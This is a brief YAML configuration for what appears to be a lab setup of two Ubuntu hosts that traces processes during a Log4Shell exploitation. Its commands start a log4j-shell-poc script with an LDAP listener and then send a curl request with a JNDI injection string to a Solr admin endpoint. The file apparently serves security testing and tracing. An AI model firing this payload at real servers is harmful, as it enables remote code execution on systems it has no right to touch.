blueprint: ubuntu2204-ubuntu2204
ubuntu1:
  trace: java
  playbook: ubuntu1.yml
ubuntu2:
  playbook: ubuntu2.yml
  trace: "curl|python3|java"
  command:
    - "sudo python3 /opt/log4j-shell-poc/poc.py --userip %ubuntu2% --webport 8080 --lport 1234||Listening on 0.0.0.0:1389&"
    - "curl 'https://ubuntu1:8984/solr/admin/cores?params=$\\{jndi:ldap://ubuntu2:1389/a\\}'"
ports: 8984

